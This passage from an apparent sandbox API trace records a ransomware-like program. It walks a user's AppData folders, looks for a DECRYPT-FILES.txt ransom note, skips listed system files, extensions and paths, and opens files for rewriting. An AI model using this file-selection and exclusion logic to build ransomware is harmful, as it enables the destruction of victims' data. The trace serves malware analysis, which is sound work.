halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my\\crls\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x27c [0180.893] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\") returned 83 [0180.893] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.893] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\\\DECRYPT-FILES.txt") returned 101 [0180.893] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my\\crls\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.893] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\") returned 83 [0180.893] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*" [0180.893] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*", lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xeef2b4c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeef2b4c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4799b8 [0180.893] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.893] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xeef2b4c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeef2b4c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.893] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.893] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.893] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeef2b4c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeef2b4c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeef2b4c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.893] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.893] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.893] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.893] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.893] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.893] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.893] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.893] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.893] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.894] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.894] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.894] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.894] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.894] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.894] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.894] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\") returned 83 [0180.894] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.894] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\" [0180.894] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\0a16c9.tmp" [0180.894] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.894] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my\\crls\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.894] CloseHandle (hObject=0x0) returned 0 [0180.894] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.894] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab03f580, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xab03f580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab03f580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.894] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.894] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab03f580, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xab03f580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab03f580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0180.894] FindClose (in: hFindFile=0x4799b8 | out: hFindFile=0x4799b8) returned 1 [0180.895] CloseHandle (hObject=0x27c) returned 1 [0180.895] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xab03f580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab03f580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CTLs", cAlternateFileName="")) returned 1 [0180.895] lstrcmpW (lpString1="CTLs", lpString2=".") returned 1 [0180.895] lstrcmpW (lpString1="CTLs", lpString2="..") returned 1 [0180.895] lstrcatW (in: lpString1="CTLs", lpString2="\\" | out: lpString1="CTLs\\") returned="CTLs\\" [0180.895] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpString2="CTLs\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\" [0180.895] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpSrch="\\Program Files") returned 0x0 [0180.895] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpSrch=":\\Windows") returned 0x0 [0180.895] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpSrch="\\Games\\") returned 0x0 [0180.895] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.895] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.895] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.895] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.895] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.895] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpSrch="\\All Users") returned 0x0 [0180.895] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.895] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.895] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.895] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpSrch="AhnLab") returned 0x0 [0180.895] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.895] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\") returned 83 [0180.895] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.895] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\\\0a16c9.tmp") returned 94 [0180.895] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my\\ctls\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x27c [0180.896] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\") returned 83 [0180.896] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.896] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\\\DECRYPT-FILES.txt") returned 101 [0180.896] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my\\ctls\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.896] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\") returned 83 [0180.896] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*" [0180.896] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*", lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xeef2b4c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeef2b4c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4799b8 [0180.896] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.896] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xeef2b4c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeef2b4c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.896] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.896] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.896] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeef2b4c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeef2b4c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeef2b4c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.896] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.896] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.896] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.896] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.896] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.896] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.896] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.896] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.896] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.896] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.896] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.897] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.897] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.897] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.897] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.897] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\") returned 83 [0180.897] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.897] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\" [0180.897] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\0a16c9.tmp" [0180.897] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.897] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my\\ctls\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.897] CloseHandle (hObject=0x0) returned 0 [0180.897] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.897] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab03f580, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xab03f580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab03f580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.897] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.897] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab03f580, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xab03f580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab03f580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0180.897] FindClose (in: hFindFile=0x4799b8 | out: hFindFile=0x4799b8) returned 1 [0180.897] CloseHandle (hObject=0x27c) returned 1 [0180.898] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab019420, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xab019420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab03f580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.898] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.898] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab019420, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xab019420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab03f580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0180.898] FindClose (in: hFindFile=0x479978 | out: hFindFile=0x479978) returned 1 [0180.898] CloseHandle (hObject=0x274) returned 1 [0180.898] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xab019420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab019420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="My\\", cAlternateFileName="")) returned 0 [0180.898] FindClose (in: hFindFile=0x479938 | out: hFindFile=0x479938) returned 1 [0180.898] CloseHandle (hObject=0x26c) returned 1 [0180.898] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x31d42f10, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xab123dc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab123dc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0180.898] lstrcmpW (lpString1="Templates", lpString2=".") returned 1 [0180.898] lstrcmpW (lpString1="Templates", lpString2="..") returned 1 [0180.898] lstrcatW (in: lpString1="Templates", lpString2="\\" | out: lpString1="Templates\\") returned="Templates\\" [0180.898] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="Templates\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\" [0180.898] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\", lpSrch="\\Program Files") returned 0x0 [0180.898] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\", lpSrch=":\\Windows") returned 0x0 [0180.898] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\", lpSrch="\\Games\\") returned 0x0 [0180.898] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.898] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.898] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.898] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.898] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.898] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\", lpSrch="\\All Users") returned 0x0 [0180.898] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.899] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.899] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.899] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\", lpSrch="AhnLab") returned 0x0 [0180.899] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.899] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\") returned 66 [0180.899] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.899] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\\\0a16c9.tmp") returned 77 